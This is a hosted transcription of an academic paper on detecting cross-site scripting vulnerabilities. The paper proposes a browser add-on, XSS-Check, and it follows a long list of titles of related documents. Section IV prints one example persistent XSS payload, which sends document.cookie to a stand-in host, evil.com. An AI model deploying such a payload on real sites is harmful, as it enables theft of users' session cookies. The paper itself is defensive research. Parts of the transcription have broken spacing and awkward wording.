Detecting XSS Based Web Application Vulnerabilities

Similar documents
Web Application Security. Philippe Bogaerts

CIS 4360 Secure Computer Systems XSS

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

CSCE 813 Internet Security Case Study II: XSS

Web basics: HTTP cookies

Web basics: HTTP cookies

Prevention Of Cross-Site Scripting Attacks (XSS) On Web Applications In The Client Side

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Among the many attacks on

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

CS 161 Computer Security

Common Websites Security Issues. Ziv Perry

Copyright

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

ROSAEC Survey Workshop SELab. Soohyun Baik

Finding Vulnerabilities in Web Applications

FIRE-FOX XSS PREVENTION

P2_L12 Web Security Page 1

CSC 405 Computer Security. Web Security

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Client Side Injection on Web Applications

Progress Exchange June, Phoenix, AZ, USA 1

EasyCrypt passes an independent security audit

Web Application Security

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Evaluating the Security Risks of Static vs. Dynamic Websites

Application vulnerabilities and defences


Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Web Security. Thierry Sans

CS 142 Winter Session Management. Dan Boneh

Information Security CS 526 Topic 11

CROSS SIIE SCRIPIING EXPlOITS AND DEFENSE

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

AN E-GOVERNANCE WEB SECURITY AUDIT Deven Pandya 1, Dr. N. J. Patel 2 1 Research Scholar, Department of Computer Application

CSC 482/582: Computer Security. Cross-Site Security

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Combating Common Web App Authentication Threats

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

RKN 2015 Application Layer Short Summary

Prevention of Cross-Site Scripting Vulnerabilities using Dynamic Hash Generation Technique on the Server Side

The security of Mozilla Firefox s Extensions. Kristjan Krips

Information Security CS 526 Topic 8

Web Security II. Slides from M. Hicks, University of Maryland

Presented By Rick Deacon DEFCON 15 August 3-5, 2007

Chrome Extension Security Architecture

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

ESORICS September Martin Johns

WebGoat Lab session overview

OWASP AppSec Research The OWASP Foundation New Insights into Clickjacking

Ms. Jevitha. K. P Assistant Professor

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

Robust Defenses for Cross-Site Request Forgery Review

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11

Hacker Attacks on the Horizon: Web 2.0 Attack Vectors

Novel Approach To Detect and Prevent Web Attacks

Base64 The Security Killer

Testing login process security of websites. Benjamin Krumnow

Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)

Computer Security CS 426 Lecture 41

Internet Security [1] VU

Web Application Penetration Testing

DYNAMIC HUFF- HASH COOKIES: PREVENTING XSS VULNERABILITIES ON THE SERVER SIDE R.JAYAPRAKASH

X-Secure: protecting users from big bad wolves

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

A SURVEY ON ROUTINE DETECTION OF WEB APPLICATION DEFENCE FLAWS

Positive Security Model for Web Applications, Challenges. Ofer Shezaf OWASP IL Chapter leader CTO, Breach Security

Robust Defenses for Cross-Site Request Forgery

Solution of Exercise Sheet 5

Robust Defenses for Cross-Site Request Forgery

Web Security, Summer Term 2012

Web Security, Summer Term 2012

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Penetration Testing. James Walden Northern Kentucky University

Configuring User Defined Patterns

WEB SECURITY: XSS & CSRF

CS 161 Computer Security

CIS 700/002 : Special Topics : OWASP ZED (ZAP)

Solutions Business Manager Web Application Security Assessment

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Bank Infrastructure - Video - 1

Automatically Checking for Session Management Vulnerabilities in Web Applications

Web Application Threats and Remediation. Terry Labach, IST Security Team

COMP9321 Web Application Engineering

Security Engineering by Ross Andersson Chapter 18. API Security. Presented by: Uri Ariel Nepomniashchy 31/05/2016

WHY CSRF WORKS. Implicit authentication by Web browsers

IronWASP (Iron Web application Advanced Security testing Platform)

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Human vs Artificial intelligence Battle of Trust

epldt Web Builder Security March 2017

Transcription:

Detecting XSS Based Web Application Vulnerabilities M.S.Jasmine M.Tech (ISCF).Student, Department of Information Technology SRM University, TamilNadu,India jasmine.srakj@gmail.com Kirthiga Devi Assistant Professor, Department of Information Technology SRM University, TamilNadu,India kirthigadevi.t@ktr.srmuniv.ac.in Geogen George Assistant Professor, Department of Information Technology SRM University TamilNadu,India geogen.g@ktr.srmuniv.ac.in Abstract- A Web Applications are developed using various technologies like HTML, JavaScript, XML, AJAX, etc. and are accessed by millions of users for various services. The vulnerabilities at the design level in these technologies lead to security breach, resulting in theft of the user s credentials. It is the type of hacking techniques to attack the web application is Cross-site scripting (XSS). XSS is a computer security vulnerability found in web applications. XSS vulnerabilities exists denial of service, stealing of cookies, session tokens, and other user sensitive data. A Cross-site scripting (XSS) targets web applications by embedding scripts in a web page that will get executed at client side or server-side and the attacker will manipulate the information in desired manner. Cross-site scripting (XSS) vulnerabilities in current browser s session in web applications are discussed in this paper. The websites may contain malicious script codes that can be detected using detection tool at the client side. In proposed model, XSS-Check addon will detect the XSS which is Persistent based on s ingle /Response cycle. It determines the user input for the webpage returned with the result, and check for the WebPages with logon functionality, information that got encoded with the http headers and includes DOM parameter. Once identified, the validation is done across dynamic WebPages in both server and client side. Keywords: Cross-site scripting (XSS), Web Application Vulnerabilities, Persistent XSS, XSS-Check add-on 291

I. INTRODUCTION Cross-site Scripting (XSS) attacks is when an attacker by sending malicious code, in the form of a browser side script, to a different end users in a w eb applications. A web application are designed and coded for dynamic web pages to provide online services for organizations. Cross-site Scripting (XSS) attack involves three parties the attacker, a client and the website. To obtain user information are associated with the website, namely username and password and other information. Cross-site scripting attacks use known vulnerabilities in web-based applications, servers, or t he plug-in systems on which they rely. A hacker able to inject malicious codes in the dynamic websites and the code is executed in the web browser, it changes the web pages. The goal of XSS attack is to steal the client cookies or any other sensitive information which is used to authenticate the client to the website. The web application vulnerability is harmful to application owner, application users and other entities. A website can prevent from XSS vulnerability by some service providers. The special characters include ( <, >, /, etc) are identified and encoded by the output and need to be filtered as input in the web applications. The websites may be vulnerable or secured, which is unaware of users to identify XSS attacks. Before accessing the websites, user can scan and detect the web application which can be used to identify secure or unsecure web application by the detection tool. The various XSS Payloads are used to scan and detecting the website vulnerabilities lively. The payloads are included in the code and easy to detect some vulnerable websites. The vulnerable website contains web pages forms which can contain malicious JavaScript code. Using JavaScript code alert, the detection tool are used to detect the XSS vulnerabilities in the websites. A web page is loaded in the browser by a client-side JavaScript code. Cross-site Scripting is a J avascript based attacks because it includes JavaScript code on a user s browser from a malicious web server which is executable. The Problem of XSS vulnerabilities are User s cookie stealing, web page modification etc. A stored or persistent XSS attacks is malicious JavaScript or code permanently stored in vulnerable database server. A stored XSS attack in which a victim requests the stored information from the vulnerable server, injects the requested malicious script into the victim s browser. The browser then executes the code or script because the vulnerable server is usually a known or trusted site. For instance, an attacker can post a message containing the malicious script to the message board, which stores and subsequently displays it to other users, causing the attacks. 292

II. PROBLEM STATEMENT To scan and detecting the web application vulnerabilities and protect the website from web-based attacks, XSS-Check add-on are developed. III. Objectives of XSS-Check add-on The objective of this paper is to study the detection of XSS vulnerabilities in web applications and the solutions to prevent such attacks. The development of XSS- Check add-on is used for detecting Crosssite scripting (XSS) vulnerabilities to protect the website from web-based attacks. XSS-Check add-on is used to detect the types of XSS which include Non persistent and Persistent based on single /Response cycle. It is used to determine if user input for t he webpage returned with the result, and check for the WebPages with logon functionality, information that got encoded with the http headers and includes DOM parameter. Once identified, the validation is done across dynamic WebPages in both server and client side. XSS-Check add-on User Interface is used to scan, detect and providing solutions to such type of XSS attacks in the current browser s session. It counts the number of attacks in the website. A XSS-Check add-on which opens as User Interface in the browser to detect the given websites. It can be used as security detection tool which detects malicious JavaScript code from the retrieved web pages. It uses various payloads as input for the website to form web pages. The user input is URL to find all the links in the given website. It crawls all the web pages that are available in website. In this add-on, all the links are stored as report. It extracts all links present in the website and scans for w eb pages form field. When clicking on Live Detect in the user interface, it retrieves all the links associated with the given website. In the next page of the user interface, it shows the number of XSS counts detected in the website. The solution link provides the prevention for de tected payloads for XSS vulnerabilities. 293

IV. Cross-site Scripting The 2 types of XSS Persistent XSS Persistent XSS Non-Persistent XSS Persistent XSS attack is also known as a stored XSS or Type-I XSS attack. Persistent XSS attack involves injecting malicious script into a website, and those scripts are stored in vulnerable database. Persistent XSS can be difficult to detect and considered more harmful than the other two attack types. A malicious script is rendered automatically, there is no need to target individual victims or lure to a third party website. An attacker can easily hide their activity; for example, in a blog could embed the script in a seemingly innocuous comment. The sensitive data are stored at risk by the visitor of the websites. A stored XSS attack in which a victim requests the stored information from the vulnerable server, injects the requested malicious script into the victim s browser. The browser then executes the code or script because the vulnerable server is usually a known or trusted site. For instance, an attacker can post a message containing the malicious script to the message board, which stores and subsequently displays it to other users, causing the attacks. A stored XSS are stored in a v ulnerable database and may be in a resource like file system. The victim gets the online message board as part of JavaScript code in the website. Persistent XSS vector <SCRIPT> document.images[0].src=http://evil. com/images.jpg?stolencookie+document.c ookie; </SCRIPT> The Persistent XSS vector starts with <script> and ends with </script> In the evil.com, the file images.jpg cookie is theft is performed. Non-Persistent XSS A Reflected XSS is a type of X SS in which a page containing a malicious code that is reflected by the browser as a search result. The attack will target the website vulnerability that deals with dynamic property of web application. A user to visit a manipulated URL with embedded malicious code using social engineering by an attacker. A modified code in the URL is 294

to be executed by the web browser when user clicks on the malicious links. V. IMPLEMENTATION Flow Diagram The solutions for s uch attacks to prevent will be provided. The label Search any website is used to enter any website for scanning the links for the given website. After giving website as input for instance http://www.google.com, It checks all the links and sub-links for the given website. Before searching, a variable check whether the given url has been passed or not as input. Report is generated which contains extracted links for the given website. The solution link which gives the prevention for respective XSS attacks. User Interface XSS-Check Flow Diagram of XSS-Check add-on User Interface This diagram shows the user input is given as URL. Live Detect is used to scan and detect the web application vulnerabilities in current browser s sessions. The label named Number of l inks displays number of X SS vulnerabilities present in current browser s session for the given website. XSS-Check User interface for XSS is used to search and scan any given website, check for specific XSS and click the Live Detect button to function the links in website for web application vulnerabilities in current browser s session. 295

The number of links related to XSS attacks present in websites are counted, display the links and provides the solutions for such attacks to prevent. The Report is generated as extraction of links for the given websites. The label named Number of Coun ts displays number of X SS vulnerabilities present in current browser s session for the given website. The solution link provides prevention of respective XSS vulnerabilities. If the url has given correctly, the website checks the url of the links lively. The process of s hort traversal is used to finding all the links that are associated with the given url. The process of comprehensive traversal is used to finding all the sub-links for e ach link. It scans the given website and search all the links that are associated with url. The function Live Detect is clicked to finding XSS for t he website. It starts finding the XSS inside the url and the url starts with http://www. Inside the website, it opens the link and find the forms that having payload. The page which is having payload able to read and scan the url related to vulnerable. Otherwise, the page could not read in the url website. The second payload is the alert to the page that visited by users. If there is no alert, the requested page cannot be open to read in the url website. For all the payloads, in the url website, the instance could not able to read the page and it returns No link found a nd it will exit the page. For all the payloads, in the url website, the instance could not able to read the page and it returns No link found a nd it will exit the page. The url starts with http://www. is the given input to search and finding cross-site scripting. It searches all the links and sub-links for the given website as input. 296

VI. CONCLUSIONS In XSS Check User Interface is used to search, scan the websites for finding all the links and detecting web application vulnerabilities. It extracts all the links and sub-links present in the website as Report. It counts the number of XSS l inks present in the website. It provides prevention for s uch attacks in solution link. VII. REFERENCES 1. Fonseca, J. and Vieira, M. A Practical Experience on the Impact of Plug-ins in Web Security, IEEE 33rd Int. Symposium on Reliable Distributed Systems, pp 21-30, 2014. 2. Yusof and A.-S.K. Pathan, Preventing Persistent Cross-Site Scripting (XSS) Attack by Applying Pattern Filtering Approach, Proc. 5thIEEEConf. Information and Communication Technology for the Muslim World (ICT4M14), 2014, pp. 1 6. 3. M. T. Louw and V. N. Venkatakrishnan, Blueprint: Robust Prevention of Cros s-site Scripting Attacks for existing browser.proc.30 th IEEE Symp Security and Privacy (SP 09), IEEE CS,331-346,2009. 4. O. Hallaraker and G. Vigna, Detecting Malicious JavaScript Code in Mozilla, In Proceedings of the IEEE International Conference on Engineering of Complex Computer Systems,2005. 5. Engin Kirdaa, Nenad Jovanovicb, Christopher Kruegelc, Giovanni Vignac, Client-side cross-site scripting protection, ELSEVIER, Computer & Security 28 592-604,2009. 6. J. Grossman, R. Hansen, P.D. Petkov, A. Rager and S. Fogie, XSS Attacks- Cross-Site Scripting Exploits and Defense. Syngress, 2009. 7. Lwin Khin Shar, Hee Beng Kuan Tan, "Defending against Cross-Site Scripting Attacks," Computer, vo1.45, no.3, pp.55-62, March 2012. 8. Jovanovic N., Kruegel C., Kirda E. Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities, IEEE Symposium on Security and Privacy, pages 258-263, 2006. 9. Jia, X. Design, Implementation and Evaluation of an Automated Testing Tool for Cros s-site Scripting Vulnerabilities, Diploma thesis, Darmstadt University of Technology, Darmstadt, Germany, 2006. 10. Acunetix. Website Security with Acunetix Web Vulnerability Scanner, Available: http://www.acunetix.com/, January 2014. 297

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback